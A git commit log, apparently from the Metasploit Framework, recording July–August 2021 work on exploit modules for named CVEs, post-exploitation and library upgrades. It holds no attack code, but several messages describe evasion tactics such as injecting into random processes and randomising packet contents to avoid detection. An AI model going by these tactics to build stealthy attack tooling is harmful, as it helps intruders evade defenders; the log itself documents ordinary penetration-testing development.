pingport80 66c0a17b14 update _write_file_powershell 2021-08-17 16:09:20 +05:30
Metasploit 3b59829c9e automatic module_metadata_base.json update 2021-08-16 17:17:27 -05:00
pingport80 6a2335e5e0 divide the file transfer in small chunks 2021-08-17 03:44:57 +05:30
space-r7 54c3628935 Land #15525, add Lucee admin file write exploit 2021-08-16 16:59:10 -05:00
pingport80 3d243a5005 add write method for powershell session type 2021-08-17 01:34:12 +05:30
A Galway 534ba9a7af splits jtr hash files, adds timeout & updates docs 2021-08-16 16:57:49 +01:00
William Vu 521ca14773 Add Lucee Administrator CVE-2021-21307 exploit 2021-08-16 10:09:34 -05:00
pingport80 05d2375721 fix localization issue and enhance rename_file method 2021-08-16 19:40:37 +05:30
Tim W f33bd8bb83 Land #15540, fix linux/macos meterpreter shell -t subshell command 2021-08-16 14:08:06 +01:00
A Galway 89b7613d6a typos, errors handiling, & removes unused args 2021-08-16 13:27:00 +01:00
A Galway 9d20fbe014 msftidy 2021-08-16 12:29:48 +01:00
bwatters 14c3eca706 Land #15303, Fix dir method for windows shell sessions (with all commits)
Merge branch 'land-15303' into upstream-master
2021-08-13 15:46:44 -05:00
bwatters cd4df70ce8 Land #15303, Fix dir method for windows shell sessions
Merge branch 'land-15303' into upstream-master
2021-08-13 15:38:21 -05:00
Grant Willcox ac1cc1c03a Land #15547, Bump rex-text to 0.2.36 2021-08-13 12:35:25 -05:00
A Galway 08c732dbb5 improves documentation and placeholder comments 2021-08-13 17:53:00 +01:00
Grant Willcox 3f4c237a53 Bump rex-text to 0.2.36 2021-08-13 11:49:38 -05:00
A Galway eb10ce8a3f rubocop cleanup 2021-08-13 17:22:37 +01:00
A Galway 8ce50af72d updates docs & adds in os reporting placeholder 2021-08-13 17:11:21 +01:00
Tim W 5acd0ee5d6 Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads 2021-08-13 16:57:04 +01:00
Metasploit 4b720559e4 automatic module_metadata_base.json update 2021-08-13 10:23:59 -05:00
Jack Heysel 5aa56b303a Land #15539, Fix cve_2018_8453_win32k_priv_esc
Fixes the check method for the above module, prior
to this change the module was not running against 1703.
2021-08-13 11:01:58 -04:00
pingport80 59af52fee4 add a protection from nil 2021-08-13 20:02:26 +05:30
A Galway 71bfb630d6 replaces smb capture server code with RubySMB 2021-08-13 15:01:56 +01:00
Grant Willcox 077ab0452c Land #15545, Bump rex-bin-tools to 0.1.8 2021-08-12 21:19:26 -05:00
Grant Willcox b8ed86dd3e Bump rex-bin-tools to 0.1.8 2021-08-12 20:05:14 -05:00
Grant Willcox 731f71b1e0 Land #15544, Bump rex-encoder in Gemfile.lock to 0.1.6 2021-08-12 18:49:10 -05:00
Grant Willcox ed3181f7e9 Bump rex-encoder in Gemfile.lock to 0.1.6 2021-08-12 18:21:02 -05:00
Metasploit c752ddc5f7 Bump version of framework to 6.1.1 2021-08-12 12:04:49 -05:00
adfoster-r7 0a504d9358 Land #15542, Patch Meterpreter scripts to work again 2021-08-12 17:57:38 +01:00
space-r7 c9bdd96c76 remove GIT_HOOK option
post-checkout is the only hook that will work
with this exploit, so no option is needed. Also update
the documentation to reflect that.
2021-08-12 10:18:13 -05:00
space-r7 31cbcb7774 add notes to updated modules 2021-08-12 10:18:13 -05:00
space-r7 0530f78d12 add comments and test 2021-08-12 10:18:13 -05:00
space-r7 70f304a548 change modules to use hash in build_commit_object 2021-08-12 10:18:13 -05:00
space-r7 03e9d82ed8 fix packfile construction, fix git push
also adds the ability to further customize
commits, including the option to use a custom
email address, name, commit message, etc.
2021-08-12 10:18:13 -05:00
space-r7 e2f1ad692b add find_obj method and delta object parsing 2021-08-12 10:18:13 -05:00
space-r7 89e6690782 remove pry statements 2021-08-12 10:18:12 -05:00
Shelby Pace 51741c8c01 account for ofs-delta / ref-delta objects 2021-08-12 10:18:12 -05:00
Shelby Pace d0c0372596 add request / response classes 2021-08-12 10:18:12 -05:00
Shelby Pace 2736599373 update comments, remove debugging statements 2021-08-12 10:18:12 -05:00
Shelby Pace a4cc95448f remove namespace 2021-08-12 10:18:12 -05:00
Shelby Pace 0fe761b838 modify options and add documentation 2021-08-12 10:18:12 -05:00
Shelby Pace 98ef499351 add git lfs and smart http changes 2021-08-12 10:18:11 -05:00
Shelby Pace 53187648c1 add module
also includes packfile obj metadata changes
2021-08-12 10:18:11 -05:00
Shelby Pace 73ad7de0a7 add parent param to git mixin
add fixes to packfile mixin
2021-08-12 10:18:11 -05:00
Shelby Pace d7161d0b90 add packfile, pkt line, and module code 2021-08-12 10:18:11 -05:00
Shelby Pace d89554e995 add git mixin changes and usage in git exploits 2021-08-12 10:18:11 -05:00
Shelby Pace 3fb225c9c6 add wrapper methods for creating git objects
use methods in git_submodule_command_exec
2021-08-12 10:18:11 -05:00
Metasploit 5e9d471d12 automatic module_metadata_base.json update 2021-08-12 08:47:04 -05:00
Spencer McIntyre 82cc8526d4 Land #15501, Add CVE-2019-11580 (Atlassian Crowd) 2021-08-12 09:38:31 -04:00
Metasploit 55593d74ff automatic module_metadata_base.json update 2021-08-11 17:51:16 -05:00
Grant Willcox 85ef49a79c Land #15535, Update psexec module to use SMBSHARE option name for consistency 2021-08-11 17:41:38 -05:00
Grant Willcox a6eaf58f84 Land #15523, Add missing command names to session compatibility warning 2021-08-11 16:40:50 -05:00
Metasploit aab314d0e5 automatic module_metadata_base.json update 2021-08-11 15:12:50 -05:00
Grant Willcox 5fdf990f24 Land #15519, Lexmark Universal Print Driver Local Privilege Escalation 2021-08-11 15:03:53 -05:00
Grant Willcox 92327461d3 Add in driver installation instructions to documentation 2021-08-11 14:40:21 -05:00
Grant Willcox 7b25bd366f Update documentation and fix a few typos so that it reflects latest changes 2021-08-11 12:25:36 -05:00
adfoster-r7 e41406d478 Patch meterpreter scripts to work again 2021-08-11 15:42:27 +01:00
pingport80 235aae068f fix minor error 2021-08-11 19:32:47 +05:30
pingport80 6c1c717f1a add a check to see the path exists 2021-08-11 19:10:22 +05:30
pingport80 14cd2a74f5 update readable to add support for powershell 2021-08-11 18:46:52 +05:30
dwelch-r7 3b77f4a748 Add option for running cmd_execute in a subshell 2021-08-11 12:05:22 +01:00
adfoster-r7 83a1ff750a Land #15534, fix powershell command length in shell_to_meterpreter 2021-08-11 10:56:11 +01:00
Jacob Baines afa3d92774 Switched to upnp implementation 2021-08-10 18:17:18 -04:00
Grant Willcox 3ef2c0cf5a Land #15520, Canon TR150 Print Driver Local Privilege Escalation 2021-08-10 16:09:36 -05:00
Dimitrie-Toma Furdui 6dae595e4e fixed version check for cve_2018_8453_win32k_priv_esc 2021-08-10 21:49:42 +03:00
Grant Willcox ab61058fa7 Land #15536, Fix HiveNightmare Option Reference 2021-08-10 10:43:15 -05:00
adfoster-r7 d56a31fe16 Fix windows secret dump kwargs usage 2021-08-10 15:47:24 +01:00
adfoster-r7 a6a08e97cc Update module side effect notes 2021-08-10 15:40:23 +01:00
Alan Foster 03400991af Update uses of open ssl 2021-08-10 15:40:23 +01:00
adfoster-r7 255f93827b Fix broken cookiejar tests 2021-08-10 15:40:23 +01:00
adfoster-r7 87e29b4599 Update thin kwargs usage 2021-08-10 15:40:19 +01:00
pingport80 05eff3e25f increase the chunk size 2021-08-10 20:07:37 +05:30
Spencer McIntyre 8dd0347337 Fix a reference to the old option name 2021-08-10 09:36:42 -04:00
pingport80 5c2090f9ae updated suggested changes and reduce the size of each chunk 2021-08-10 18:45:26 +05:30
adfoster-r7 21e380d036 Pin pcaprub dependency 2021-08-10 13:50:00 +01:00
adfoster-r7 b9d2f30bbd Update psexec module to use SMBSHARE option name for consistency 2021-08-10 13:17:57 +01:00
adfoster-r7 c97263b9d3 Add support for ruby 3 2021-08-10 12:58:09 +01:00
Tim W d1fa2e857d fix #15528, fix powershell command length in shell_to_meterpreter 2021-08-10 12:08:50 +01:00
Metasploit b527833971 automatic module_metadata_base.json update 2021-08-10 05:57:51 -05:00
adfoster-r7 fedcdc386b Land #15493, Rails 6.1 upgrade 2021-08-10 11:49:25 +01:00
dwelch-r7 783ae5ed29 Land #15533, Update json rpc spec tests 2021-08-10 11:21:11 +01:00
Jacob Baines b3dbf7c0e9 Altered the approach in check 2021-08-09 22:05:16 -04:00
adfoster-r7 50b576cc2e Update json rpc spec tests 2021-08-10 00:10:05 +01:00
Grant Willcox 55404ff29f Further fixes from review and further touch up edits 2021-08-09 14:23:05 -05:00
dwelch-r7 be9dda40bd Land #15327, Update rpc analyze command to support latest functionality 2021-08-09 18:32:00 +01:00
Jeffrey Martin d240292253 move web service api code into library path 2021-08-09 12:22:43 -05:00
Jeffrey Martin 3f2c70323c ensure location of framework is on the LOAD_PATH 2021-08-09 12:22:43 -05:00
Jeffrey Martin 4de3dfca7e include documentation gem when built 2021-08-09 12:22:42 -05:00
Jeffrey Martin 1555160acd Rails 6.1 upgrade represents a minor version bump
Due to compatibility requirements this upgrade needs an explicit version bump.
2021-08-09 12:22:42 -05:00
Jeffrey Martin 8d66913c00 guard hrr_rb_ssh from zeitwerk eager loading
if/when eager loading is enabled any class or top level require
will be exercised during the process.  Since the ruby builtin PTY
does not function in Windows, defer requires that inveract with symbols
in the `hrr_rb_ssh` gem to ensure they load only during runtime.
2021-08-09 12:22:13 -05:00
Grant Willcox c03ca1d39d Fix RuboCop error 2021-08-09 12:21:07 -05:00
Jeffrey Martin ab31500d7f swap hrr_rh_ssh for hrr_rh_ssh-ed25519
Take newer upstream gem now available.
2021-08-09 12:16:13 -05:00
Alan Foster c8cc111318 Rename class.parents to class.module_parents 2021-08-09 12:16:13 -05:00
Jeffrey Martin 5b56179d8e lock for rails 6.1 2021-08-09 12:16:12 -05:00
Jeffrey Martin 7a549d94f8 remove laoder initializer 2021-08-09 12:16:12 -05:00
Jeffrey Martin ff088c67ce deprecated model error pattern 2021-08-09 12:16:12 -05:00
Jeffrey Martin 1fe26b8c6c connection_config is deprecated 2021-08-09 12:16:11 -05:00
Jeffrey Martin 047a1eba07 Rails 6.1 upgrade 2021-08-09 12:16:08 -05:00
Grant Willcox f8d838bba2 Fix first round of comments from the review process 2021-08-09 12:13:27 -05:00
Metasploit 59dd2575e5 automatic module_metadata_base.json update 2021-08-09 11:47:56 -05:00
Christophe De La Fuente 07c9350733 Land #15430, Support for SSH pivoting 2021-08-09 18:34:08 +02:00
adfoster-r7 fade59dc64 Add missing command names to session compatibility warning 2021-08-09 17:13:26 +01:00
Grant Willcox 8517286e89 RuboCop fix to description to make it happy 2021-08-09 10:05:21 -05:00
Grant Willcox 838142362c Apply first round of updates from review comments to improve explanations of the vulnerability and fix some minor issues 2021-08-09 09:59:09 -05:00
Gaurav Purswani 300328fafe Update lib/msf/core/post/file.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-08-09 20:19:12 +05:30
Metasploit 8b4080e027 automatic module_metadata_base.json update 2021-08-09 08:22:21 -05:00
Spencer McIntyre b406257e6b Land #15524, fix a localization issue 2021-08-09 09:03:56 -04:00
pingport80 bc23658123 minor sytling changes 2021-08-09 15:53:58 +05:30
Jacob Baines 7703810c4a Fixed rubocop issue 2021-08-07 06:59:50 -04:00
Jacob Baines 0e41a0e81e Addressed all but one review items 2021-08-07 06:46:49 -04:00
Spencer McIntyre 06b671e710 Add the SSLVersion datastore option for servers
Requires rapid7/rex-socket#37 for the option to be honored.
2021-08-06 14:44:53 -05:00
Spencer McIntyre c43d55068c Add the SSLVersion datastore option for handlers
Requires rapid7/rex-socket#37 for the option to be honored.
2021-08-06 14:44:48 -05:00
Jacob Baines 8d699c0c4e Addressed various review comments 2021-08-06 14:55:50 -04:00
pingport80 815ecd27c3 minor changes 2021-08-06 22:35:05 +05:30
pingport80 d2c2f66374 fix localization issue in linux_enum_network 2021-08-06 22:13:25 +05:30
Grant Willcox 2addf355f7 Land #15518, Bump rex-socket version to 0.1.32 2021-08-06 09:33:42 -05:00
Jacob Baines f6e6451ab6 Merge branch 'rapid7:master' into canon_lpe 2021-08-05 17:07:00 -04:00
Jacob Baines 2e9acc6ba3 Merge branch 'rapid7:master' into lexmark_lpe 2021-08-05 16:25:34 -04:00
Grant Willcox f38d953515 Bump rex-socket version to 0.1.32 2021-08-05 14:57:52 -05:00
Alan Foster 2c73c14931 Update rpc analyze command to support latest functionality 2021-08-05 20:18:31 +01:00
Grant Willcox ade653f0bf Final fixup edits to change the timeout value to be an advanced option and also to use send_req_cgi 2021-08-05 13:10:24 -05:00
Metasploit 056859364e Bump version of framework to 6.0.57 2021-08-05 12:05:02 -05:00
kensh1ro a4a2a4d5cc Add fix for generating random valid C keywords 2021-08-05 18:26:58 +03:00
Jacob Baines f851faf2e4 Initial commit for Canon driver exploit 2021-08-05 11:17:45 -04:00
Grant Willcox 00cfdc4f17 Use Faker to generate a fake app name, add in option to specify timeout to server, and also fix Alan's remaining review comments 2021-08-05 09:46:34 -05:00
Jacob Baines 4cff38b9c2 Fixed rubocop issues 2021-08-04 16:41:20 -04:00
Jacob Baines 699c53151b Fixed msftidy issues 2021-08-04 16:14:27 -04:00
Jacob Baines e6c48db072 Initial version of CVE-2021-35449 2021-08-04 16:08:43 -04:00
adfoster-r7 520440e6ba Land #15500, Cookie jar fix for gitlab and cacti exploit module issues 2021-08-04 11:50:27 +01:00
kensh1ro 87e7718a25 Adding a dynamic way to fetch syscalls 2021-08-04 09:31:43 +03:00
test 97bef87197 Updated Output for clarity 2021-08-03 20:43:06 -04:00
test 0a749df4fe Made console messages clearer 2021-08-03 20:40:01 -04:00
A Galway 5e732ddd42 changes parse to take an origin and updates tests 2021-08-03 18:22:23 +01:00
Metasploit 8858a1ca8f automatic module_metadata_base.json update 2021-08-02 15:52:31 -05:00
Grant Willcox 1b182eed33 Land #15503, Fix for file clean up in the Cisco Hyperflex file upload RCE module 2021-08-02 15:36:53 -05:00
Grant Willcox 0912723faf Land #15508, Update metasploit payloads gem to 2.0.50 2021-08-02 11:55:11 -05:00
Grant Willcox 0d7d5ab93f Switch over to Rex::MIME::Message to use our built in mixins, and also fix last remaining review comments 2021-08-02 11:17:26 -05:00
pingport80 4fbf532faf fix one error in offset value 2021-08-02 20:12:25 +05:30
adfoster-r7 0214b7c32a Land #15461, GitHub Actions: Termux issue label: auto close issue 2021-08-02 15:21:29 +01:00
Brendan Coles 8a4bf53143 GitHub Actions: Termux issue label: auto close issue 2021-08-02 13:54:29 +00:00
pingport80 d590702922 fix variable names 2021-08-02 18:44:03 +05:30
pingport80 92e13d10f1 fragement the file into small parts 2021-08-02 18:39:16 +05:30
Tim W 0c7f4429e1 Update metasploit payloads gem to 2.0.50 2021-08-02 13:24:10 +01:00
kensh1ro 907be4418e Added module syscall_inject with documentation 2021-08-01 19:22:32 +03:00
Grant Willcox 27f70af1b3 Fix up some of the mistakes wvu pointed out 2021-07-30 15:28:10 -05:00
Jack Heysel 29b193406e Fix for file clean up in the Cisco Hyperflex file upload RCE module 2021-07-30 14:59:52 -04:00
Grant Willcox 5b3bbf7f36 Fix up tabs formatting issue that was causing RuboCop to complain. Silly RuboCop :) 2021-07-30 12:17:46 -05:00
Grant Willcox 3427571887 Push up working CVE-2019-11580 exploit and associated documentation 2021-07-30 12:07:12 -05:00
A Galway ff111ecd13 remove silent catches of http-cookie argument errs 2021-07-30 17:33:04 +01:00
agalway-r7 3668230d44 reposition self return in add
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2021-07-30 16:16:12 +01:00
agalway-r7 33a34af0df improve error handling
Co-authored-by: dwelch-r7 <Dean_Welch@rapid7.com>
2021-07-30 16:06:53 +01:00
Metasploit 569660b890 automatic module_metadata_base.json update 2021-07-30 06:08:33 -05:00
Simon Janusz 7260b220a2 Land #15498, Update postgres schema dump 2021-07-30 12:01:16 +01:00
adfoster-r7 18aef5e4db Land #15492, Align support for negative session ids 2021-07-30 11:45:22 +01:00
sjanusz 8cb3731e46 Add support for negative session and job ids 2021-07-30 10:22:44 +01:00
adfoster-r7 6a00b2fa43 Update postgres schema dump 2021-07-29 19:41:49 +01:00
Metasploit f30e7df229 Bump version of framework to 6.0.56 2021-07-29 12:04:20 -05:00
Metasploit e3e562f13c automatic module_metadata_base.json update 2021-07-29 12:01:27 -05:00
Spencer McIntyre dba3db741a Land #15462, [CVE-2021-36934] HiveNightmare 2021-07-29 12:53:48 -04:00
Metasploit 71c135029f automatic module_metadata_base.json update 2021-07-29 11:46:46 -05:00
Spencer McIntyre 202f291d30 Land #15497, Add Pi-Hole DHCP Module Side Effects 2021-07-29 12:37:21 -04:00
adfoster-r7 951809e164 Land #15491, add module stability notes 2021-07-29 17:24:42 +01:00
space-r7 d69fb22699 add side effects to pihole dhcp module 2021-07-29 11:23:01 -05:00
space-r7 809081bc5f Land #15279, add Pi-Hole lpe 2021-07-29 11:15:17 -05:00
space-r7 0561ae978f fix typos, pihole version in docs 2021-07-29 11:13:58 -05:00
Spencer McIntyre 36cc2fd7e5 Rename an option and update docs for HiveNightmare 2021-07-29 12:07:56 -04:00
Yann Castel fb99af1152 Add post module for HiveNightmare
correct CVE id

Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb

Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>

Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>

Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>

Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>

use of vars_get + delete payload after use

initial commit

Update hivenightmare_windows_sam_leak.rb

using railgun to read files + specific index option

Update hivenightmare_windows_sam_leak.rb

post module + add description + add documentation

Delete wp_plugin_modern_events_calendar_rce.rb

Delete wp_plugin_modern_events_calendar_rce.md

add scenario in doc

Update windows_sam_hivenightmare.md

Update windows_sam_hivenightmare.rb

Update modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>

minor changes

msftidy

Update modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb

Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2021-07-29 11:54:31 -04:00
Metasploit f2ab7c3207 automatic module_metadata_base.json update 2021-07-29 10:36:04 -05:00
dwelch-r7 15edd30fa2 Land #15359, Fix #15218 authentication issue in ssh_login_pubkey 2021-07-29 16:27:35 +01:00
Metasploit 8a55249285 automatic module_metadata_base.json update 2021-07-29 08:34:49 -05:00
Spencer McIntyre 453172ae62 Land #15163, CVE-2021-31802 - R7000 RCE 2021-07-29 09:26:58 -04:00
Spencer McIntyre 9934f5d5ab Remove a useless variable assignment for rubocop 2021-07-29 08:54:07 -04:00
test e926886e88 Updated search functionality. 2021-07-28 17:20:10 -04:00
Grant Willcox a518fcac98 Add in timeout to 10th and final request to prevent module from throwing errors like it isn't working when it really is 2021-07-28 11:32:47 -05:00
cgranleese-r7 56510a2e8e Updates some notes on modules that weren't passing tests due to new rubocop rule 2021-07-28 16:20:02 +01:00
pingport80 d7112d0d33 add gzip compression for read file powershell 2021-07-28 20:49:46 +05:30
Metasploit 12b7e613c5 automatic module_metadata_base.json update 2021-07-28 10:03:14 -05:00
adfoster-r7 8c43a7a512 Land #15465, Update local exploit suggester to handle nil targets and modules raising unintended exceptions 2021-07-28 15:55:41 +01:00
A Galway 5219c980f7 adds origin values to cookies without domain 2021-07-28 14:08:25 +01:00
A Galway c7d4155511 add origin to httpcookie and supporting tests 2021-07-28 14:04:48 +01:00
sjanusz 1288e85b6b Improved exception handling 2021-07-28 10:22:15 +01:00
sjanusz c63ef142c5 Update local exploit suggester to handle nil targets 2021-07-28 10:22:15 +01:00
Grant Willcox a13f6a35dc Use fail_with to properly handle the case where the target isn't the one we support 2021-07-27 13:00:44 -05:00
Grant Willcox 8dec3eaaaa Lock target into a specific firmware version as we don't have time to spend trying to get the heap overflow working for other firmware versions 2021-07-27 13:00:43 -05:00
Grant Willcox 6a787336e4 Improve the check function by using a different file that leaks details about the version of the router firmware on more devices without running into the issue of some of them requiring authentication 2021-07-27 13:00:37 -05:00
Grant Willcox 98e69f7d10 Fix up namespacing for some Check codes that would be hit under certain conditions to be proper, preventing our module throwing errors 2021-07-27 13:00:29 -05:00
Grant Willcox a53411229f Move files over to start work on converting this into an auxiliary module 2021-07-27 13:00:17 -05:00
Grant Willcox 8954dd5d2d Add in documentation and update module description to match 2021-07-27 13:00:15 -05:00
Grant Willcox 22c88bedcf Fix a bug whereby the host would be hardcoded to the IP address 192.168.1.1 which may not always be the case 2021-07-27 13:00:02 -05:00
Grant Willcox 3b670644b2 Add in random characters into certain areas of the packets where 'a''s were being used previously to help make things harder to detect 2021-07-27 12:59:46 -05:00
Grant Willcox d06b9c8bda Add in first working copy of netgear_r7000_backup_cgi_heap_overflow_rce.rb 2021-07-27 12:59:38 -05:00
pingport80 4dd0a5f8be change method name to _read_file_powershell 2021-07-27 20:17:04 +05:30
pingport80 2cd20e5698 add support for binary files for powershell session types 2021-07-26 23:52:20 +05:30
Spencer McIntyre 50bf0d4075 Land #15460, Fix localization issue in copy_file 2021-07-26 12:03:22 -04:00
Metasploit 1e9c83645d automatic module_metadata_base.json update 2021-07-26 10:11:59 -05:00
Shelby Pace 183caff15c Land #15418, add modern events calendar rce 2021-07-26 09:45:05 -05:00
Shelby Pace 38ae82155e modify info, fix spacing 2021-07-26 09:43:34 -05:00
A Galway 80f809bc78 handled cookies without valid domain value 2021-07-26 14:29:03 +01:00
Spencer McIntyre 426898e065 Add a tip and note in the module docs 2021-07-26 09:13:11 -04:00
Metasploit c66f25c658 automatic module_metadata_base.json update 2021-07-23 12:46:03 -05:00
Shelby Pace 9e95eb7be1 Land #15408, add Wordpress sp doc file upload 2021-07-23 12:36:29 -05:00
Grant Willcox 51e02a9ede Remove userinit.exe from list of random processes for execute_dll as its somewhat unreliable and spawns noticeable processes 2021-07-23 12:34:32 -05:00
Grant Willcox 31b82452ec Fix up Spencer's comments from review to correctly pass in parameters to execute_dll() as some calls were passing the wrong set of parameters 2021-07-23 12:34:25 -05:00
Grant Willcox 2fb379374f Update documentation where possible for changed exploits 2021-07-23 12:34:12 -05:00
Shelby Pace d207f994c0 modify doc description
randomize form data, formatting
2021-07-23 12:33:41 -05:00
Grant Willcox fabc566402 Improve process.rb's execute_dll to now automatically detect the architecture of the target and of the DLL and then appropriately decide if it needs to launch a WoW64 process to inject into. 2021-07-23 12:33:41 -05:00
Grant Willcox bc0439fc47 Improve the list of potential processes to spawn and inject into to be more believable 2021-07-23 12:33:16 -05:00
Grant Willcox 96b15c9650 Update process.rb to support injecting into a random process and not just notepad.exe all the time to improve signature evasion. Also support injecting into one's own Meterpreter process for further stealth. Finally update one module to showcase off how these changes look like on a real module. 2021-07-23 12:33:01 -05:00
Spencer McIntyre e4100c8018 Fix rubocop issues in the handler file 2021-07-23 11:12:46 -04:00
Spencer McIntyre a13acf9647 Fix rubocop issues in channel files 2021-07-23 11:09:09 -04:00
Spencer McIntyre 0314569e3d Fix rubocop issues in session files 2021-07-23 10:58:13 -04:00
adfoster-r7 a24d2f0a10 Land #15464, Add missing rex requires 2021-07-23 15:40:20 +01:00
Metasploit 855c8a86fd automatic module_metadata_base.json update 2021-07-23 09:02:46 -05:00
cgranleese-r7 2844792484 Adds requires to support meterpreter_commands_dependencies.rb rubocop rule 2021-07-23 14:58:26 +01:00
adfoster-r7 c8f1c845ea Land #15463, Reformats modules so they're compatible with Rubocop Rule 2021-07-23 14:55:31 +01:00
cgranleese-r7 9e7859ed25 Reformats some modules so they can be run with new meterpreter_commands_dependencies.rb Rubocop rule 2021-07-23 14:40:19 +01:00
Hakyac 0f8e256d52 Update modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:12:57 +02:00
Hakyac 13678f5140 Update modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:12:51 +02:00
Hakyac 1a55cfc88c Update documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:12:10 +02:00
Hakyac 76a7233ee9 Update documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:12:00 +02:00
Hakyac cf9a5be774 Update documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:11:49 +02:00
Hakyac 9cdddac5cd Update modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:11:26 +02:00
Hakyac 877ac006f8 Update modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:11:21 +02:00
Hakyac 73995ac8d1 Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:09:44 +02:00
Hakyac 5e2776411d Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:09:25 +02:00
Hakyac 8a3f5affe8 Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:09:13 +02:00
Hakyac 9eb8d521f8 Update documentation/modules/exploit/multi/http/wp_plugin_modern_events_calendar_rce.md
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-23 10:08:19 +02:00
pingport80 46051d5bf4 fix localization issue in copy_file method 2021-07-23 10:20:31 +05:30
Metasploit 336ce487ef automatic module_metadata_base.json update 2021-07-22 13:06:20 -05:00
Spencer McIntyre 73380be4ab Land #15444, Add additional powershell support 2021-07-22 13:58:07 -04:00
Metasploit e635a9655a Bump version of framework to 6.0.55 2021-07-22 12:04:19 -05:00
Shelby Pace 7a39f4c4dd Land #15211, add apache tapestry gatherer 2021-07-22 11:58:03 -05:00
Spencer McIntyre c11ee468e0 Land #14683, Add a check for EXE templates 2021-07-22 12:27:33 -04:00
Shelby Pace a83bb187e4 add reliability trait 2021-07-22 10:52:16 -05:00
Shelby Pace 58891313c8 add notes 2021-07-22 10:46:37 -05:00
Shelby Pace 6203499684 fix rubocop offenses 2021-07-22 10:27:17 -05:00
Gaurav Purswani 57c35ee9c1 Update lib/msf/core/post/file.rb
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2021-07-22 20:07:06 +05:30
pingport80 f49640f2b6 suggested changes by @smcintyre-r7 2021-07-22 19:16:06 +05:30
adfoster-r7 262dc00517 Land #15458, Fix typo in doc comment 2021-07-22 12:04:15 +01:00
await Marsha d7435091e2 Fix typo in doc comment. 2021-07-22 02:14:09 -05:00
Shelby Pace bc1f106bcb change method of retrieving key
add checks on responses, update docs
2021-07-21 17:56:41 -05:00
pingport80 e8f1aa945d update expand_path for powershell 2021-07-21 23:37:46 +05:30
Yann Castel a3e5bd527b use of vars_get + delete payload after use 2021-07-21 09:59:05 +02:00
Hakyac 53214e8792 Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-21 09:41:46 +02:00
Hakyac 09ca7751c0 Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-21 09:41:38 +02:00
Hakyac 815a6d4d95 Update modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-21 09:41:28 +02:00
Yann Castel c169c78f03 use of vars_get 2021-07-21 09:38:36 +02:00
Hakyac 7e3281dfcf Update modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-21 09:08:30 +02:00
Hakyac 40220052da Update modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-07-21 09:07:12 +02:00
Metasploit d9e4aadc40 automatic module_metadata_base.json update 2021-07-20 20:45:10 -05:00
William Vu af0092f290 Land #15400, Sage X3 modules 2021-07-20 20:36:48 -05:00
William Vu b9a71449e5 Add module docs 2021-07-20 20:07:08 -05:00
William Vu 0ba430c8c4 Fix a bunch of things
Mostly RuboCop and refactoring.
2021-07-20 20:07:08 -05:00
Metasploit cb52956a54 automatic module_metadata_base.json update 2021-07-20 16:02:32 -05:00
Shelby Pace 79d49a6857 Land #15402, add Wordpress Backup Guard rce 2021-07-20 15:53:57 -05:00
Shelby Pace f738383b98 rename docs, modify privileged to false
use vars_get in upload request
2021-07-20 15:31:38 -05:00
Yann Castel 4a9bef2e9f various suggestions 2021-07-20 19:10:39 +02:00
Yann Castel 010d3e5a4a various suggestions 2021-07-20 18:22:37 +02:00
William Vu 8b5071326e Merge remote-tracking branch 'upstream/master' into pr/15400 2021-07-20 11:11:45 -05:00
Metasploit c4b14046ca automatic module_metadata_base.json update 2021-07-20 09:56:38 -05:00
